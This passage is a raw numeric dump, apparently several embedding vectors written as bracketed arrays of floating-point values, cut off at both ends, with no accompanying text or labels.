061113834,-0.066736154,-0.03772937,-0.028864782,0.039092485,-0.026019892,-0.009234613,-0.038247272,0.0072911642,-0.011660988,-0.03509199,0.015467393,-0.06526097,0.012925609,0.032058157,0.012017916,-0.039068133,0.054644227,0.010303938,-0.037638832,-0.005468744,0.032169085,0.00051626837,-0.00548571,-0.022566514,-0.015898028,0.008311988,-0.0041707004,0.017045403,-0.016223375,-0.013033743,-0.027476158,0.04775913,-0.006175128,-0.045906164,-0.0039931634,0.0060060574,0.02106073,0.014263517,-0.053672764,0.020419361,-0.023798348,0.004514224,0.028022584,0.017980913,0.026167154,-0.03597259,0.017625423,-0.0019950483,0.053211443,0.0077680894,-0.0315393,-0.026692303,-0.02117906,-0.02821917,-0.013165927,0.015057058,0.052761618,-0.03127517,0.021761853,0.062046994,0.037754387,0.014764925,-0.033709884,-0.05566986,-0.044848364,0.021299973,0.0197643,0.028711919,-0.02167943,0.041707538,-0.030823775,-0.04375526,-0.033230137,-0.019001033,-0.015180901,0.01783633,-0.0153928595,-0.0016722527,-0.001010103,0.028719006,0.039373294,0.008038079,0.021848846,0.017461574,-0.00059345324,-0.003188885,-0.03416163,-0.0598233,-0.06030075,-0.023659812,-0.010325022,-0.004327741,0.0201386,0.015196451,-0.0068524093,-0.0030686092,0.011184782,-0.0049149757,-0.034872472,0.0014176959,0.03537015,0.009780242,0.03173612,0.0008038593,0.014404551,0.04055453,-0.021586495,0.05246633,-0.0046648416,0.056587834,0.010839593,0.014959664,-0.03960575,-0.01027489,-0.02341564,-0.011634811,-0.021292739,-0.06958282,0.019624466,-0.03668155,-0.010451269,-0.007056977,-0.014416218,-0.00901489,0.044660512,0.043417346,-0.02431472,0.036874585,-0.06788193,0.012339199,-0.025871022,0.017911002,0.04407507,-0.007546978,0.00017128217,-0.011202663,0.01619995,0.0721453,0.031836472,0.023754338,-0.036787033,-0.025207024,0.020403221,0.030790487,0.0026290016,-0.009466858,0.015256284,0.055832352,-0.015046981,0.033896048,-0.02677385,0.019569065,-0.010575056,-0.045204353,-0.012973832,0.0005716857,0.040902358,-0.026672006,0.004404315,-0.013914129,-0.013341779,0.03032518,0.023459386,0.021422377,0.010866151,0.023024673,-0.0045844605,0.023066834,0.01270291,0.035440143,-0.007938483,0.015528093,-0.010331682,0.004400023,0.0027426407,0.051666375,0.01724537,0.004125209,-0.036926273,-0.024203625,0.015376885,-0.025773495,0.00734418,-0.020899365,0.041992202,-0.012242859,0.004311708,0.005463901,-0.020505244,0.011958337,-0.00997531,0.009619515,0.017610883,0.02349343,-0.016599543,-0.006501785,-0.020312604,0.005584195,-0.012980256,-0.03295092,0.025569245,0.0064413445,-0.04979389,0.07126546,0.00248105,0.009223282,0.08498432,-0.053139072,-0.042323653,0.0349027,0.022166727,-0.031860054,0.02255737,-0.031485453,-0.011917141,0.020259105,-0.007934526,-0.012526795,0.053340014,-0.06751554,-0.087105334,0.022702087,-0.001484436,0.054746553,0.012888739,-0.035981514,-0.009456461,0.008321532,0.049664002,-0.012315569,-0.035113916,0.022029577,0.006841987,0.056174368,0.05479607,0.0031377506,-0.045807038,0.07466567,-0.021658495,-0.004297064,0.014724746,-0.001960883,0.027178075,0.022586107,0.026372187,0.025795799,0.0058574015,0.031028533,-0.05795348,-0.005059432,-0.021021178,0.007882753,0.074912824,0.09249528,-0.047476076,-0.031159692,0.08176726,0.05525236,0.0047923867,0.04096664,0.023657354,0.09729593,-0.022698836,0.057321206,0.025039805,0.048545014,0.069600634,0.017885186,-0.027423216,-0.07199902,0.0060334415,-0.0042159813,-0.031296313,-0.004323482,-0.03817505,0.014245837,0.08230377,-0.05143104,-0.016706364,0.025468595,-0.03326906,-0.028652837,0.047259808,-0.0063072643,-0.032631867,-0.006439982,0.020761965,0.035988577,-0.05901564,-0.03203883,-0.041599177,0.015937474,0.058335777,0.0020283065,-0.031738985,0.013410142,-0.010434622,0.04042467,0.03581837,0.02004279,-0.020882538,-0.07162013,-0.030308831,-0.027999857,-0.0016036538,0.06209863,-0.009330817,-0.007120123,0.039848134,0.016197892,-0.010812211,0.016833901,-0.039938916,0.060456827,-0.05678624,-0.053448096,0.01324268,-0.006155478,0.024071818,0.041903287,0.011250299,0.04480032,-0.04848407,0.0027458055,0.04419082,-0.04644685,0.010252095,0.03902632,-0.05415475,0.0032994684,0.006289807,-0.0343223,-0.0048912144,0.015976187,-0.114631906,0.042187244,0.0112692565,0.06439445,0.040435094,-0.038776558,0.0013643982,-0.004069144,-0.006890407,-0.016080758,0.018754708,0.043785896,0.017948983,0.0323157,0.023333665,-0.0006281401,-0.060637336,0.0016108671,-0.023497561,-0.029025683,0.03535908,0.032961916,-0.07794083,0.017687427,-0.06744288,0.028768254,-0.05745979,0.0070504956,0.009532465,-0.025967367,-0.028284272,-0.037576992,-0.046976767,-0.058558065,-0.015819408,0.0612238,0.015820405,0.010227284,-0.044718847,-0.024262602,-0.026331885,0.00089655473,0.013212476,0.06469048,-0.08914087,0.010431276,0.007995696,-0.0054732766,-0.04659346,0.06742448,0.027485358,-0.031094898,-0.06522292,0.03868069,-0.044136316,0.013407874,-0.0028261922,-0.020452587,0.01213913,-0.05510615,-0.019587917,-0.015086153,0.0015180461,-0.007431594,-0.05510597,0.034546923,-0.011444567,-0.030857395,0.0012893543,-0.00058624696,-0.009341265,-0.04686912,-0.08087417,0.018651957,0.03300726,0.0535895,-0.07632093,0.017613117,0.0871603,-0.022557491,0.037159417,0.040961105,0.019588104,-0.014129734,0.020801513,-0.030191887,0.0220891,0.000902973,-0.056258082,0.06969054,-0.037360426,-0.030804329,-0.039334226,-0.030297132,-0.06379826,0.03111963,-0.023047244,0.01627876,-0.0035274753,0.008392537,-0.01792988,0.037706804,0.010279401,-0.0621202,0.0011463632,-0.0669148,0.0039084074,-0.06926494,-0.005741388,-0.012498168,0.008823489,0.006423551,0.07160275,0.037850488,-0.03645357,-0.027270803,-0.023489296,0.03774018,-0.0080180075,0.03347235,0.06871392,0.022538284,-0.020001471,0.08936269,0.086513124,0.01556169,-0.0110952435,-0.012854698,-0.019014223,0.0315302,0.002011069,-0.009223148,-0.014488964,-0.010181277,-0.040385902,-0.057354614,0.027168864,0.044028286,-0.023784406,-0.037717976,-0.020516748,-0.0093258675,-0.0657018,0.03703225,0.037529025,-0.0020309326,-0.008255981,-0.008194891,0.016290644,0.03767375,0.038005322,-0.025289033,-0.027328389,-0.009476205,0.011698262,0.013602492,-0.005791746,0.024532966,-0.009940349,-0.030556582,-0.030387359,-0.002292341,0.014058814,-0.0012959347,-0.023389654,0.0017837352,-0.02359392,-0.027351586,0.027876731,0.018097585,-0.035670433,0.01586759,0.054723978,-0.034911267,0.034680575,-0.0059425323,0.00803919,-0.029688561,0.021774568,0.01699866,0.0051507666,0.0024909237,-0.04526624,-0.03750188,-0.0061610835,-0.02693205,0.027716361,-0.010246012,0.044334278,-0.025688961,-0.0350611,-0.016449273,0.017986335,0.025024101,0.017627876,-0.06343198,0.013121828,0.021119751,-0.02747668,0.010030457,-0.033685658,0.025144305,-0.07143966,-0.025988834,-0.0010561283,-0.06607266,0.039533973,0.01851629,-0.016783247,0.012448024,0.020745467,-0.0700227,-0.0009511214,-0.088319644,0.051536903,0.057068843,-0.0074565588,0.008088288,-0.016038869,-0.027773049,0.05072741,-0.0020830065,-0.038280927,0.0020404758,-0.040254325,-0.010454111,-0.003898814,-0.0514461,0.04714145,0.020444913,0.018888636,0.11886965,-0.00565382,0.0217462,-0.018518658,0.0376421,-0.015340417,-0.029429711,-0.04257438,-0.03403267,-0.010161681],[0.018802075,0.07883057,-0.1676609,-0.06276755,0.03025237,-0.010866524,-0.018256012,0.01870355,-0.030386431,-0.032821234,-0.014224474,0.006190319,0.081836954,0.0010564447,0.030513017,-0.07035667,-0.012106468,-0.04020858,-0.015986256,0.043384597,0.0015855231,0.051115707,0.010266505,-0.07243602,0.02136261,0.044886228,-0.009277976,0.002187846,-0.034452613,-0.049140215,0.009361361,-0.07525568,-0.010277572,0.019172743,-0.050380297,-0.0043827086,0.0010294804,0.0022720178,-0.017616956,0.037888687,0.045648552,0.031013072,-0.0021888402,-0.049702957,0.084863424,-0.006374632,0.025926227,0.027184075,0.06305283,-0.06946598,-0.020062456,0.020842647,-0.030590901,0.023596544,0.089819394,0.013406997,-0.071983874,0.014414028,-0.009953411,-0.055437554,0.08814468,0.09871742,-0.098074645,0.034802012,0.021469794,-0.0004858224,-0.023456223,0.053426057,0.018412057,-0.049448226,0.013697269,0.01361547,0.00023220699,0.038928963,-0.088850185,-0.042932555,-0.008370224,-0.0035679894,-0.026083853,0.07319328,-0.031276084,0.01490272,0.07366853,0.025620323,0.051841576,0.0046874774,-0.0017335545,-0.01618939,-0.07781812,0.07185916,0.0042729387,0.014506198,0.025826916,0.037225213,-0.07082601,-0.016469367,-0.010785137,0.015618372,-0.031030983,-0.06606268,-0.033394363,0.013101239,0.03904933,-0.018267214,0.042704467,0.031853702,0.030830977,0.004322195,-0.055277456,0.023855614,-0.023482017,0.005479499,-0.028768629,-0.0028425357,-0.054495957,-0.051999226,0.008569182,-0.0032082212,0.021598255,0.027844759,0.010820238,-0.016816596,-0.025484633,0.034965154,-0.025369832,-0.0027588678,-0.050039683,-0.0022390785,-0.021253653,-0.027086219,0.0021045338,-0.0009236409,-0.0119828,-0.003207688,0.015915494,0.05209535,-0.04532482,0.0007273275,0.008240822,0.02507148,0.032500263,0.018877542,-0.0063418285,-0.039991766,0.014598268,-0.016869968,-0.0031886292,-0.04477984,-0.063828416,0.0018911163,0.008527272,0.044260565,-0.0017379905,0.039089754,0.058486994,-0.001753572,0.00076148927,-0.024260988,0.004733665,0.006618156,0.024107004,-0.003249877,-0.057673626,0.059496056,0.006969145,-0.018428797,-0.015850753,0.034077745,0.0017160008,0.039921016,-0.06659118,-0.0009114457,0.018420152,-0.024330013,0.023859909,0.0040088925,0.070981026,-0.05253614,-0.0034972646,0.003006048,-0.0021655585,-0.055339105,0.04393551,0.04015385,-0.046270605,-0.019642062,-0.017022274,-0.03126189,0.016698591,-0.033935197,0.030597381,0.01927672,0.008797549,-0.03398451,-0.0166084,-0.044590626,0.03331147,0.030517874,0.036956932,-0.06665687,-0.059894886,0.019527191,-0.05452832,-0.013620705,-0.05123637,0.049137194,0.017427916,0.04634914,-0.013906487,0.018276032,0.028691472,-0.037640143,0.024414483,0.013741862,0.007608627,0.011599092,-0.009756628,-0.010350617,-0.03366979,0.021877605,0.012499453,-0.0039022332,0.007028953,-0.04553628,0.042154267,0.016418455,-0.058662187,-0.0050446307,0.0056931176,0.043294165,0.009542202,-0.08184394,0.046618257,-0.027752204,-0.023254901,0.023971062,0.02777015,0.06630412,-0.010600275,0.0055656307,0.02369226,0.0049301963,-0.010027702,0.022411747,-0.031562094,-0.03301608,-0.03389881,-0.0002487516,-0.0108042825,0.06645801,-0.03777033,-0.0049520293,0.03392632,0.039596744,0.008700613,-0.013466767,-0.01194703,-0.023598569,0.0051778127,0.008298356,0.022984246,-0.028389625,-0.0045670397,-0.047248393,-0.007056567,-0.008950801,-0.026984643,0.026170239,0.011284799,-0.011902055,-0.004143906,0.025290173,-0.012855558,0.05442849,-0.019494416,0.0074404716,0.0045793154,-0.031473428,-0.002401953,0.009892288,-0.008671481,-0.061366074,0.029874226,-0.0018603355,0.0035362728,-0.001464791,0.018838478,-0.011035961,0.009091061,0.026257321,0.018015474,-0.05791473,0.035617776,0.0130344145,-0.031101683,0.039998204,0.019378075,-0.0047806636,0.010037578,-0.055155154,-0.013737135,0.007262716,0.06029697,0.04581221,0.03232486,-0.019071031,0.008749245,-0.020559538,-0.0057831006,-0.023863884,-0.027164415,-0.027204167,0.0010315825,-0.0061655943,-0.05944714,0.02235942,0.04822172,0.009297438,0.044647403,-0.012514518,0.031240752,-0.069758676,0.056184288,-0.03984942,-0.024728315,0.05860701,-0.027446903,0.002821185,-0.02664792,0.014283429,0.011222104,0.042604998,0.023629108,-0.04697836,-0.02261066,0.0524299,-0.036141247,-0.018425606,0.029696552,-0.024042245,0.031584494,-0.018253133,0.009793099,0.0030709568,0.0034834102,0.01668788,-0.043846842,0.009061623,0.04234942,0.03861256,-0.014916398,0.0152913155,-0.032959986,-0.0075802286,0.0023781466,0.03039073,0.018995464,0.03564231,0.013032815,-0.034680247,0.06404331,0.006904587,0.02509682,0.010977094,-0.024534479,-0.0047303354,0.0641448,-0.011206707,0.052328225,0.024319446,0.0036792234,-0.02236239,-0.06250606,0.0053814454,0.008528832,-0.01722701,-0.09245175,-0.0063595595,-0.02551324,0.0030831916,0.032796875,0.012442018,-0.008607674,0.029999744,0.009512071,-0.025786081,0.026018519,0.010743608,-0.013849185,0.054923214,-0.036168482,-0.07720748,-0.013361041,-0.0030896051,0.01097669,-0.06478052,0.050365683,-0.011887204,-0.005976276,0.048235424,-0.05985205,-0.07649673,0.052854624,-0.02446213,-0.014923398,0.0320035,0.0031611556,-0.01911939,0.0050941454,0.013961487,0.018250274,0.008345032,-0.03242893,-0.032754242,0.008753445,0.013017118,0.05899923,-0.018404359,-0.022983303,0.018189447,0.03653464,0.032098472,0.004982571,-0.007255022,0.038671,0.013586608,0.027504506,0.047553234,0.0028588423,-0.02947072,0.02978769,0.009028154,0.017878078,-0.039292775,-0.0055831135,0.0081503,0.0060348557,0.037528742,0.0047319643,0.014283488,0.008777296,-0.03162396,-0.05762008,-0.0473776,-0.0025996673,0.050114688,0.038757786,-0.02716193,-0.100299016,0.015851125,0.013168618,0.036597595,-0.022779843,0.015620684,0.09409469,-0.010909137,0.009939834,0.004886455,0.038944483,0.013382289,0.023951756,0.027288953,-0.05232713,-0.0017729515,0.01680599,-0.0327659,-0.023165686,-0.014339117,0.028153174,0.031768057,-0.030402688,0.018333046,0.043780077,-0.051893145,-0.010705785,-0.018501926,-0.022732968,0.021367123,0.01489433,-0.005507471,0.016777968,-0.04134555,-0.06696312,-0.019285226,-0.04423594,0.0668493,-0.008105593,-0.003750265,-0.017324215,0.0036886104,0.05700577,-0.013663966,0.013803473,0.015494558,-0.041932788,0.0075356252,-0.03808952,0.017902808,0.056103386,0.008260061,0.06096221,0.023675544,-0.033646394,0.010026856,0.011316797,-0.010404473,0.09068862,-0.0356065,-0.053394772,0.036730636,0.023619905,-0.0057032076,-0.035983942,-0.011503628,0.05527235,-0.088397555,0.008725569,-0.010071624,-0.067240626,0.004507222,-0.02880793,-0.06819716,0.003120833,0.02728017,-0.076302715,-0.012705805,0.010499669,-0.06325956,-0.0056340275,0.003180746,0.057036493,0.034487963,-0.036112655,-0.0112516405,0.035656042,0.01057643,-0.0280572,-0.021617517,0.025947899,0.029080508,0.03250976,0.006092125,0.05395654,0.004691203,0.025871305,-0.00057022594,-0.0036061185,0.047200337,0.013479636,-0.045738153,0.046989057,-0.056487896,0.026579134,-0.0365627,0.03482189,-0.016887886,-0.0023509462,-0.008951549,-0.03086645,-0.060854178,-0.035852853,0.0340281,0.06001008,0.012440956,0.015853288,-0.01141215,-0.02621617,0.008319361,0.016606662,0.024617199,0.005640468,-0.0479981,-0.017402887,-0.022667294,0.048368186,-0.029130299,0.03492497,-0.030837337,-0.036190458,-0.039562017,0.02636315,-0.029708575,0.028380223,-0.020279592,-0.053984955,0.026417386,-0.05689824,-0.028338958,-0.01076585,-0.027012182,-0.01094579,0.010200399,0.08504028,-0.04543983,-0.0019381709,-0.02279552,-0.011163895,0.000037612637,-0.041987572,-0.07499972,0.037464906,0.047341634,0.07413252,-0.013520107,0.045615233,0.09704354,-0.017434075,-0.023318317,-0.020844985,-0.017108928,0.049854614,0.01402898,-0.005619662,-0.00073634135,-0.010720502,-0.071526505,0.0339744,-0.032797556,-0.020559689,-0.039491616,-0.034692302,-0.079249434,0.04019009,-0.039401792,0.040687416,-0.004613968,-0.017414,-0.027545763,0.009781044,0.02455202,-0.01003099,0.017145852,-0.031121727,0.0015942408,-0.056835666,0.040121462,-0.027821312,-0.021488773,-0.0036921133,0.056269504,0.0029556204,-0.058568645,-0.0075097685,0.01709819,0.12644368,-0.037495583,0.000029361223,0.030065965,0.04206242,-0.021407856,0.055558126,0.09712302,-0.006831645,-0.0016386904,-0.019825255,0.0056579723,0.057363722,-0.029728016,-0.061608925,-0.000025580508,-0.014924515,-0.0064738896,-0.018224888,0.021527851,0.016233904,0.028427,0.00023762195,-0.0314037,-0.025836878,-0.007896321,0.025706561,0.05706995,-0.010540904,-0.059630435,-0.0059459493,0.021741167,0.02354749,0.012332808,-0.011924225,0.01010034,0.008146219,0.00068639644,0.004156884,-0.0223687,0.009782725,-0.049017303,0.02295046,0.014910234,-0.019048573,-0.052327145,-0.016970621,-0.060006067,0.012549342,-0.016337272,0.03896545,0.029176822,-0.00056173076,-0.033519108,0.0002869052,0.079653904,0.023241566,0.041279547,0.0066950177,0.03228258,0.02819288,0.015801402,0.015617153,-0.032415736,0.015094616,-0.05012433,-0.06570283,0.041833457,0.02702667,0.07359689,-0.0037667784,0.05264632,0.006037021,-0.056210734,-0.047485642,0.01940766,0.055384986,-0.03581783,-0.025832586,0.027806995,-0.015305993,0.019110093,-0.014485392,-0.057113655,0.01028591,0.025947142,-0.023320943,-0.02254873,-0.058686912,0.0722711,-0.021497026,0.01303318,-0.0142714875,-0.004639195,-0.06243493,-0.00029186,-0.017027762,0.026546616,0.011648186,0.052807238,-0.012570585,-0.023164256,0.02516846,0.049610227,0.048727002,-0.034358665,-0.004001758,0.006472866,0.025317391,0.027421314,-0.024808504,0.00014385836,0.007239483,0.06374766,0.13997489,0.0175417,0.023197444,-0.047643315,0.06511284,-0.023864351,-0.04709882,0.016336337,-0.0730213,-0.036491245],[0.045827113,0.046245426,-0.16883163,-0.08982953,0.046528466,-0.027733166,0.021470815,0.025089564,-0.013062807,-0.016587362,0.036911864,-0.0119265085,0.10307017,0.0065305973,0.029112902,-0.06577284,-0.04256393,-0.054944526,-0.005631669,0.040656433,-0.020703923,0.021971438,-0.021655193,-0.0073838974,0.053095408,0.050720863,-0.03292294,-0.013775859,-0.060331807,-0.0062900744,0.06543588,0.0072069652,-0.04885913,0.015128361,-0.03396407,-0.04331579,0.051930066,0.024665527,-0.054818474,0.05331098,0.07113062,0.038690407,-0.040088166,-0.02124119,-0.029237878,0.028304162,-0.010538457,-0.0073403055,0.019291865,-0.0015999433,0.012124416,0.03651304,0.032926388,0.011299376,0.08512394,0.025814457,-0.0030756223,0.029404923,0.03378008,-0.07074782,0.10086291,0.074069165,-0.031347934,0.009448173,0.060236912,-0.06475733,-0.016148807,0.038275197,-0.018357813,-0.039533086,0.01818204,0.026232142,0.006601881,0.006605819,-0.055808872,-0.02512424,-0.033161912,-0.010905388,-0.010831494,0.045039427,0.021678487,0.009459321,0.10802969,-0.006203543,0.03172532,0.016169425,-0.022842294,-0.02161861,-0.031680968,0.040986516,0.028642856,-0.010523556,0.037440587,0.0052715316,-0.06875234,0.026923086,0.015936319,-0.00433723,-0.053940967,-0.036264636,-0.084026106,0.019962989,0.012153901,0.02185762,0.0688057,0.043364264,-0.013568089,-0.014359921,-0.025023444,-0.003401335,-0.016546452,0.029169386,-0.046894755,-0.026657015,-0.039174475,-0.036236364,0.05585047,-0.03862314,0.025824446,0.08189528,-0.010853538,0.012276983,0.006926837,0.07020661,-0.019489724,-0.016143039,-0.016564373,0.015836332,-0.03133885,-0.038292103,-0.021122456,-0.040723585,-0.032751475,0.017720375,0.04396356,0.0994502,-0.018051427,0.006421434,0.029611256,-0.0068017268,0.020202648,0.029366756,-0.02440974,0.0012279389,0.03190361,-0.038754333,0.038865045,-0.023672523,-0.03203338,0.028872121,0.024581507,0.025073562,-0.047981657,0.00236991,0.0024423138,-0.022381196,0.01586015,-0.04661604,-0.013405581,0.032260194,0.00581818,-0.000896812,-0.067329645,0.033217058,-0.031234598,-0.040607613,-0.007536916,-0.005178403,0.00733567,0.014916418,-0.07890896,0.029274562,0.007873403,0.0059988275,0.03719099,-0.011438475,0.07806343,-0.028777886,0.0076016285,-0.055832166,-0.007249597,-0.07067675,-0.014756384,0.047837596,-0.0033428324,-0.02710982,-0.030211115,0.00940371,-0.037741497,-0.023025645,-0.00031077844,0.0077317585,-0.022642499,-0.0008023168,-0.061470173,0.014793921,0.014739278,-0.027128952,0.018517537,-0.033951893,-0.039669342,-0.025939394,-0.101623975,-0.00616189,-0.030082509,0.07684003,0.014349182,0.02475215,-0.04869128,0.038878076,0.031545028,0.014869521,0.04144902,0.033370588,-0.0017810471,-0.009196385,-0.003044764,-0.01665498,-0.029689945,0.040487926,0.024653766,0.0043725795,-0.02318762,0.01976408,0.013940563,-0.009249059,-0.018409587,0.004716496,-0.030695356,-0.024442092,-0.033461384,-0.09772336,0.05314255,-0.02074213,0.023728017,-0.004573663,0.015976297,0.05628802,-0.034485266,0.065584734,0.008920529,0.044900067,-0.0032910965,-0.040794525,-0.029498145,0.009122598,0.031599443,-0.05149516,-0.009165551,0.084693275,0.008745644,0.023421261,0.045584865,0.046289194,0.030010076,-0.029697511,-0.052442297,0.037898257,-0.015543005,-0.016567357,0.024930188,-0.05383997,0.010749732,-0.044328127,-0.074208416,-0.010229515,-0.039214227,-0.037449025,0.0040937765,-0.0141040115,0.021818358,0.020840231,0.008898129,0.017162742,-0.0035370889,0.026905337,0.00728276,-0.0024055715,-0.037579782,-0.00040968572,-0.023659639,-0.024273908,-0.017764553,0.015187466,-0.016887417,0.043315906,-0.019446403,0.0009180878,0.016790671,-0.016560657,0.012998066,-0.038444467,-0.05636246,0.015766295,0.024744637,0.013555156,0.059618358,-0.01263214,-0.022231033,-0.07703568,0.0520396,0.057650965,0.036296487,0.070296936,0.009181064,-0.018871414,-0.015505394,-0.045306295,0.018671034,-0.009403051,0.004906713,0.007968851,-0.013375971,0.0035742861,-0.027869795,0.040260717,0.0208048,0.038535554,0.029641781,0.03682417,0.023819955,-0.015187292,0.024278417,-0.070913926,-0.027667437,0.016411686,-0.036102176,0.009739061,-0.014929034,-0.012227575,0.023840617,0.018068261,0.010506429,-0.07869734,-0.049352255,0.050738994,-0.003186585,0.011488014,-0.008937692,0.0036573126,0.10079185,-0.022389835,0.022550575,-0.054022472,0.03206668,0.020080673,-0.028011357,0.019576482,0.042166315,-0.0009458753,0.0029283112,0.022624897,-0.011946295,-0.028852662,0.035584223,-0.007975622,0.05388513,0.031715132,-0.004178233,-0.04790039,0.04298683,0.011455938,0.037193518,0.004283227,-0.016205454,0.026149103,0.02380054,-0.011703618,0.041775204,0.011065496,-0.002338675,-0.029938444,-0.0093092015,0.04426205,-0.042821463,-0.031244604,-0.055308416,0.0012466769,0.017202577,0.058106285,0.029265318,0.015886098,0.019466642,0.050651614,0.043719742,-0.020336289,-0.018038815,-0.024407258,0.044154745,0.027720477,0.0035614278,0.0022271706,-0.03424325,-0.028872488,0.006340877,-0.024415893,-0.008890762,0.034152653,0.0030880703,0.051179346,-0.06475068,-0.08942069,0.009012125,0.025355317,-0.015372149,0.032720137,-0.012636408,-0.047538925,0.032848313,-0.028613932,-0.018144323,0.057962522,-0.0147810085,-0.013950317,0.016181223,0.027626116,0.054441065,-0.014664971,-0.025284683,-0.030624822,0.05204587,0.049793202,0.021329025,0.053468492,-0.012931258,0.025892321,0.012994689,0.029588852,0.0067013833,-0.012665391,0.034478147,0.013501369,0.03265203,0.009276314,-0.059586138,0.037973564,0.017688809,0.07875067,0.018521998,-0.026779663,0.023551332,-0.0728912,0.02577474,-0.022924699,0.011959042,0.098718636,0.0024874539,-0.028565409,-0.034356046,0.029177168,-0.0204591,-0.008574003,0.030654786,0.008675496,0.10292755,-0.070456356,0.024744095,0.00554667,0.00022596397,0.00796766,0.027616221,0.042394497,-0.05923941,0.027207578,0.016582772,-0.033676587,0.010647448,-0.049761612,0.014093696,0.025429895,-0.024403855,0.015443176,0.013416562,-0.04440073,0.03810587,0.02408601,0.022016808,0.0062969956,-0.023035493,0.031534486,0.020308811,-0.044302925,-0.01390366,-0.063730754,0.0005246229,0.015991092,-0.003554971,-0.033419102,-0.007859243,-0.009009507,0.010071361,-0.018236428,0.0058965925,-0.0003807549,-0.06787995,-0.010676305,-0.034418922,0.006529755,0.029898312,0.0247832,0.021278137,0.049566016,0.030175047,-0.0063472036,0.02412421,-0.0061562336,0.06641251,-0.06703843,-0.06905568,-0.030783063,-0.0112477,0.037860494,-0.0028803626,0.020854035,0.006688057,0.0017195818,0.034758385,0.013150655,-0.08442625,0.011831715,0.0120995585,-0.049528968,-0.006965307,0.015738262,-0.011795574,0.035314336,-0.0062560337,-0.08328239,0.057461385,0.0012952692,-0.011201758,0.024327464,0.001248748,-0.0022765452,-0.0016789665,-0.019043446,-0.024914969,-0.0110446615,0.06921142,0.008590219,-0.00139543,-0.009718789,0.0029214774,0.009843824,0.052030835,-0.022370283,0.017133506,0.01629074,0.012500498,-0.07247468,0.035896804,-0.01617323,0.017435417,-0.04141599,-0.0047817924,-0.059643414,-0.002141914,-0.052956402,-0.041558623,-0.03818325,-0.044075467,0.051196497,0.06254598,0.028924948,-0.04425964,-0.022481088,-0.0022388536,-0.020387499,0.0017424538,0.008098834,0.015347163,-0.07309377,-0.024438806,-0.020970149,-0.0059100823,-0.020760268,0.065764084,0.040866368,-0.038426623,-0.070519716,0.019022848,-0.011290741,0.013122509,0.0011659943,0.01308161,-0.022650799,-0.08577155,0.03160957,0.009169754,-0.032904927,-0.013342899,-0.022973342,0.023478843,-0.007847836,-0.040403742,0.029423155,-0.024725767,0.037137583,-0.04437495,-0.04355788,-0.025675124,0.03731959,0.05805603,-0.07762346,0.01715009,0.019201223,0.006652801,0.0012701967,-0.009226245,-0.014575447,0.029227702,-0.012855688,0.01882509,-0.039316606,0.017257152,-0.024012605,0.0315745,-0.036113836,-0.014859279,-0.03503706,0.012058733,-0.05042876,0.026036201,-0.033537,0.030758698,-0.007673741,-0.07471579,-0.02949064,-0.013531983,-0.0009158546,-0.051510986,0.01975725,-0.058065765,-0.022036556,-0.05172255,0.06328236,-0.004926545,-0.006571129,0.06623171,0.0144926235,0.0021536313,-0.034568105,0.036478788,0.016338114,0.05602229,-0.04674919,0.015249223,0.030684786,0.023473945,0.0049199862,0.08391497,0.07565201,0.004228615,-0.007813543,-0.00044600316,0.00013823804,0.026826665,0.0011067021,-0.040829834,-0.03367167,0.013875538,0.01142565,0.010060875,0.003355767,-0.030553142,-0.03529139,-0.0036334263,0.03468724,-0.03696751,0.002769761,0.04016089,-0.0012681764,0.013176705,0.007208955,-0.02310956,0.05671864,-0.01259462,0.024673687,-0.00232793,-0.042012863,-0.032736834,0.042242188,0.01881207,-0.034535088,-0.04235837,-0.043948885,0.007914805,-0.007465688,-0.012841498,0.0032154943,-0.012362396,-0.05476061,-0.009552366,-0.03207324,0.019525453,-0.001180039,0.014248088,-0.023748657,-0.048789125,0.08695501,-0.010653697,0.025546236,0.02009971,-0.0071973978,-0.012509992,-0.012752673,0.018315034,0.016593978,0.010352224,-0.015751217,-0.056785967,0.0034978902,-0.008720668,0.02051709,0.008993479,0.03486481,-0.005036587,-0.05238094,-0.0040295636,0.057317138,0.0016194995,-0.009789007,-0.077178665,-0.042479243,0.009686439,0.03855463,0.06753825,-0.0037235848,0.015798697,-0.0066920375,0.0021483577,0.025345735,-0.038475644,0.026108671,-0.02876388,-0.0005074612,0.033474844,-0.02984493,-0.061173063,-0.047120232,-0.080684744,-0.013453218,0.030709473,0.024527675,0.0137012005,-0.031797223,0.005885188,0.035134126,0.006878267,-0.03902249,0.031608265,0.02195193,-0.009460999,-0.0129318265,0.011766077,0.0011375482,-0.04143513,0.038675353,0.115548916,0.055884704,0.04405921,0.037068143,0.04503767,0.0016795825,-0.045216363,-0.06394536,-0.036270898,-0.016223771],[0.0013058131,0.07949274,-0.15094997,-0.08313471,0.06596623,-0.050698943,0.0014374976,0.032079257,-0.02326365,0.004410179,-0.070700295,0.03188014,0.051300537,0.002931719,0.032698527,-0.029264458,-0.035063013,-0.039485,0.018018644,-0.005591658,-0.05180194,0.030690385,0.03723152,-0.02200784,0.054547753,0.034696743,-0.0019426254,0.0006439723,-0.0612698,-0.014293744,0.037619267,-0.013837042,-0.011824957,0.009674503,-0.069302686,-0.015495846,0.01738873,0.045912445,0.018605718,-0.004115668,0.087135695,0.013725441,-0.019100787,0.051646337,-0.004348786,-0.051918626,0.024651183,-0.023390653,0.05283442,-0.05865246,0.01882176,0.014449086,-0.0014574087,0.012333738,0.093072794,0.024568321,0.026615882,0.022559674,-0.022651369,-0.06381928,0.061489224,0.0877634,-0.05241828,0.06800249,0.04652096,0.010559183,-0.04787848,0.040588684,-0.0003498393,-0.038542107,0.028152209,0.014304919,-0.012746168,0.009081338,-0.04654604,-0.039889038,-0.016810415,-0.038314663,0.029073391,0.04492329,0.03837964,-0.0147433905,0.040570613,0.0044918414,0.018865319,0.0050454116,-0.024818106,-0.02702247,-0.053275827,0.011826096,-0.0058370344,-0.021800429,0.0013824959,-0.026050035,-0.082504116,0.048296597,-0.008794293,0.034479827,-0.046648707,-0.042673882,-0.03401206,-0.010356069,0.038060468,0.041982457,0.01690229,0.03701913,0.020539958,-0.015481697,-0.03397039,-0.023672553,-0.061530814,0.050577953,-0.027271274,-0.030366255,-0.011060815,-0.021726988,0.03299787,-0.03295965,-0.0098749455,0.030682975,-0.009070072,-0.011640897,0.0037189205,0.07406425,-0.006649805,0.04607963,-0.020733517,0.026487859,0.017211862,-0.06412504,0.00730282,-0.023680754,0.013602309,0.013126903,-0.00918918,0.040414866,-0.0047565694,-0.03769839,0.022025092,-0.01423942,0.009694282,0.016543427,0.007604512,-0.028942153,0.031555906,-0.058404688,-0.009188724,-0.036531456,-0.036462467,0.058936965,0.02992174,0.0359288,-0.0070423046,0.008816421,0.008619021,-0.019347506,0.033108365,-0.026357118,-0.011065283,0.043150824,0.046093285,